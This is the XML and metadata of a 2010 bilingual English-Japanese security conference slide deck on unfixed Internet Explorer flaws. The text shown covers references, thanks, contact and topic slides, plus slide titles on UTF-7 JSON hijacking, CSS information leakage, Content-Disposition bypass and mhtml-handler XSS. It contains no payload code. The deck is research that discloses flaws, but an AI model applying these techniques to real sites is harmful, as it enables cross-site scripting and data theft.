              <a:t>Attacking with Character Encoding for Profit and Fun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1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>http://bit.ly/alE7F3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" smtClean="0"/>
              <a:t>JUMPERZ.NET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1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>http://www.jumperz.net/test/xss10.jsp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" smtClean="0"/>
              <a:t>CSSXSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>を改良した？手法で</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" smtClean="0"/>
              <a:t>mixi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" smtClean="0"/>
              <a:t>post_key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>を抜き取るデモを作りました </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" smtClean="0"/>
              <a:t>- ?D of K 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1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>http://d.hatena.ne.jp/ofk/20081111/1226407593</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" smtClean="0"/>
              <a:t>Internet Explorer Cross-Origin CSS Style Sheet Handling Vulnerability - Advisories - Community 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1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>http://secunia.com/advisories/41271/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>［これはひどい］</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" smtClean="0"/>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>の引用符の解釈 － ＠</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" smtClean="0"/>
              <a:t>IT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>http://www.atmarkit.co.jp/fcoding/articles/webapp/01/webapp01a.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" smtClean="0"/>
              <a:t>[openmya:038082] MS07-034: mhtml:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>プロトコルハン ドラによる任意のスクリプトの実行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600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>http://archive.openmya.devnull.jp/2007.06/msg00060.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1900" smtClean="0"/>
              <a:t>JavaScript execution via MHTML-scheme - HTML5 Security Cheatsheet</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1900" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>http://heideri.ch/jso/#96</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="200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76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Thanks to </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="Malgun Gothic" pitchFamily="34" charset="-127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David Ross and MSRC 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helpful suggestions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0"/>
              <a:t>Lever_One</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t> for telling details about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0"/>
              <a:t>mhtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t> issue. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:latin typeface="Malgun Gothic" pitchFamily="34" charset="-127"/>
                <a:ea typeface="Malgun Gothic" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>...and You!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:latin typeface="Malgun Gothic" pitchFamily="34" charset="-127"/>
                <a:ea typeface="Malgun Gothic" pitchFamily="34" charset="-127"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:latin typeface="Malgun Gothic" pitchFamily="34" charset="-127"/>
                <a:ea typeface="Malgun Gothic" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>Thank you for your attention.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0">
              <a:latin typeface="Malgun Gothic" pitchFamily="34" charset="-127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77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Question? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>質問</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="Malgun Gothic" pitchFamily="34" charset="-127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mail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>hasegawa@utf-8.jp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>hasegawa@netagent.co.jp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Twitter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>@hasegawayosuke</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Web site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>http://utf-8.jp/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78</a:t>
            </a:fld>
            <a:endParaRPr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65454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5740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8000" dirty="0" smtClean="0"/>
              <a:t>Today's topic</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="6600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="6600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="6600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:cs typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>今日の話題</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="6600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:cs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Today's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topic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:cs typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>今日の話題</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill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IE6 is 'spoilt milk' web browser.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IE6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は腐ったミルクみたいなブラウザ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pPr lvl="1"/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Microsoft themselves admitted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Microsoft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自身も認めている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Many security flaws left untouched for years.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長い間放置されている問題点が多数。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Junst only IE6? No.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" b="1" smtClean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IE6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だけ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP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? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>まさか。</a:t>
            </a:r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endParaRPr lang="en-US" altLang="ja-JP" b="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
              <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="ja-JP" b="1" smtClean="0">
              <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
              <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US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3B08-6B92-4B0D-AB63-EC8965080B81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03040" y="3356992"/>
            <a:ext cx="8389440" cy="28083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3609</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>画面に合わせる (4:3)</PresentationFormat>
  <Paragraphs>930</Paragraphs>
  <Slides>78</Slides>
  <Notes>78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78</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="92" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Aharoni</vt:lpstr>
      <vt:lpstr>メイリオ</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Candara</vt:lpstr>
      <vt:lpstr>ＭＳ ゴシック</vt:lpstr>
      <vt:lpstr>HG創英角ﾎﾟｯﾌﾟ体</vt:lpstr>
      <vt:lpstr>Malgun Gothic</vt:lpstr>
      <vt:lpstr>Aparajita</vt:lpstr>
      <vt:lpstr>Office テーマ</vt:lpstr>
      <vt:lpstr>Internet  Explorer exSpoilt Milk codes       ～ IEへの腐ったミルク攻撃 ～</vt:lpstr>
      <vt:lpstr>Who am I ? 自己紹介</vt:lpstr>
      <vt:lpstr>Obfuscated JavaScript 難読化JS</vt:lpstr>
      <vt:lpstr>Obfuscated JavaScript 難読化JS</vt:lpstr>
      <vt:lpstr>スライド 5</vt:lpstr>
      <vt:lpstr>Obfuscated JavaScript 難読化JS</vt:lpstr>
      <vt:lpstr>Obfuscated JavaScript 難読化JS</vt:lpstr>
      <vt:lpstr>Today's topic 今日の話題</vt:lpstr>
      <vt:lpstr>Today's topic 今日の話題</vt:lpstr>
      <vt:lpstr>IE6 is 'spoilt milk' browser IE6は腐ったミルクみたいなブラウザ</vt:lpstr>
      <vt:lpstr>Today's topic 今日の話題</vt:lpstr>
      <vt:lpstr>Many flaws left untouched for years 長い間放置されている問題点が多数</vt:lpstr>
      <vt:lpstr>Today's topic 今日の話題</vt:lpstr>
      <vt:lpstr>Just only IE6? No. IE6だけ? まさか。</vt:lpstr>
      <vt:lpstr>Today's topic 今日の話題</vt:lpstr>
      <vt:lpstr>Untouched flaws 放置されたままの問題点</vt:lpstr>
      <vt:lpstr>Untouched flaws 放置されたままの脆弱性</vt:lpstr>
      <vt:lpstr>Untouched flaws 放置されたままの脆弱性</vt:lpstr>
      <vt:lpstr>MLang encode conversion issue MLangのエンコード変換時の問題</vt:lpstr>
      <vt:lpstr>MLang encode conversion issue MLangのエンコード変換時の問題</vt:lpstr>
      <vt:lpstr>MLang encode conversion issue MLangのエンコード変換時の問題</vt:lpstr>
      <vt:lpstr>MLang encode conversion issue MLangのエンコード変換時の問題</vt:lpstr>
      <vt:lpstr>MLang encode conversion issue MLangのエンコード変換時の問題</vt:lpstr>
      <vt:lpstr>MLang encode conversion issue MLangのエンコード変換時の問題</vt:lpstr>
      <vt:lpstr>MLang encode conversion issue MLangのエンコード変換時の問題</vt:lpstr>
      <vt:lpstr>MLang encode conversion issue MLangのエンコード変換時の問題</vt:lpstr>
      <vt:lpstr>Untouched flaws 放置されたままの脆弱性</vt:lpstr>
      <vt:lpstr>Untouched flaws 放置されたままの脆弱性</vt:lpstr>
      <vt:lpstr>JSON Hijack with UTF-7</vt:lpstr>
      <vt:lpstr>JSON Hijack with UTF-7</vt:lpstr>
      <vt:lpstr>JSON Hijack with UTF-7</vt:lpstr>
      <vt:lpstr>JSON Hijack with UTF-7</vt:lpstr>
      <vt:lpstr>JSON Hijack with UTF-7</vt:lpstr>
      <vt:lpstr>JSON Hijack with UTF-7</vt:lpstr>
      <vt:lpstr>JSON Hijack with UTF-7</vt:lpstr>
      <vt:lpstr>JSON Hijack with UTF-7</vt:lpstr>
      <vt:lpstr>JSON Hijack with UTF-7</vt:lpstr>
      <vt:lpstr>JSON Hijack with UTF-7</vt:lpstr>
      <vt:lpstr>Untouched flaws 放置されたままの脆弱性</vt:lpstr>
      <vt:lpstr>Untouched flaws 放置されたままの脆弱性</vt:lpstr>
      <vt:lpstr>Bypass Content-Disposition Content-Dispositionの回避 </vt:lpstr>
      <vt:lpstr>Bypass Content-Disposition Content-Dispositionの回避 </vt:lpstr>
      <vt:lpstr>Bypass Content-Disposition Content-Dispositionの回避 </vt:lpstr>
      <vt:lpstr>Bypass Content-Disposition Content-Dispositionの回避 </vt:lpstr>
      <vt:lpstr>Bypass Content-Disposition Content-Dispositionの回避 </vt:lpstr>
      <vt:lpstr>Untouched flaws 放置されたままの脆弱性</vt:lpstr>
      <vt:lpstr>Untouched flaws 放置されたままの脆弱性</vt:lpstr>
      <vt:lpstr>infomation leakage via CSS CSSを通じた情報の漏えい</vt:lpstr>
      <vt:lpstr>infomation leakage via CSS CSSを通じた情報の漏えい</vt:lpstr>
      <vt:lpstr>infomation leakage via CSS CSSを通じた情報の漏えい</vt:lpstr>
      <vt:lpstr>infomation leakage via CSS CSSを通じた情報の漏えい</vt:lpstr>
      <vt:lpstr>infomation leakage via CSS CSSを通じた情報の漏えい</vt:lpstr>
      <vt:lpstr>Untouched flaws 放置されたままの脆弱性</vt:lpstr>
      <vt:lpstr>Untouched flaws 放置されたままの脆弱性</vt:lpstr>
      <vt:lpstr>JavaScript back-quotes issue JavaScriptバッククォート問題</vt:lpstr>
      <vt:lpstr>JavaScript back-quotes issue JavaScriptバッククォート問題</vt:lpstr>
      <vt:lpstr>JavaScript back-quotes issue JavaScriptバッククォート問題</vt:lpstr>
      <vt:lpstr>JavaScript back-quotes issue JavaScriptバッククォート問題</vt:lpstr>
      <vt:lpstr>JavaScript back-quotes issue JavaScriptバッククォート問題</vt:lpstr>
      <vt:lpstr>Untouched flaws 放置されたままの脆弱性</vt:lpstr>
      <vt:lpstr>Untouched flaws 放置されたままの脆弱性</vt:lpstr>
      <vt:lpstr>XSS with mhtml handler mhtmlハンドラによるXSS</vt:lpstr>
      <vt:lpstr>XSS with mhtml handler mhtmlハンドラによるXSS</vt:lpstr>
      <vt:lpstr>XSS with mhtml handler mhtmlハンドラによるXSS</vt:lpstr>
      <vt:lpstr>XSS with mhtml handler mhtmlハンドラによるXSS</vt:lpstr>
      <vt:lpstr>XSS with mhtml handler mhtmlハンドラによるXSS</vt:lpstr>
      <vt:lpstr>XSS with mhtml handler mhtmlハンドラによるXSS</vt:lpstr>
      <vt:lpstr>XSS with mhtml handler mhtmlハンドラによるXSS</vt:lpstr>
      <vt:lpstr>XSS with mhtml handler mhtmlハンドラによるXSS</vt:lpstr>
      <vt:lpstr>Untouched flaws 放置されたままの脆弱性</vt:lpstr>
      <vt:lpstr>Untouched flaws 放置されたままの脆弱性</vt:lpstr>
      <vt:lpstr>Untouched flaws 放置されたままの脆弱性</vt:lpstr>
      <vt:lpstr>Fixed at IE9b IE9ベータでは修正済み</vt:lpstr>
      <vt:lpstr>Conclusion まとめ</vt:lpstr>
      <vt:lpstr>Conclusion まとめ</vt:lpstr>
      <vt:lpstr>References 参考資料</vt:lpstr>
      <vt:lpstr>Thanks to </vt:lpstr>
      <vt:lpstr>Question? 質問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2010-09-14T09:24:59Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2010-12-18T15:41:36Z</dcterms:modified>
</cp:coreProperties>
</file>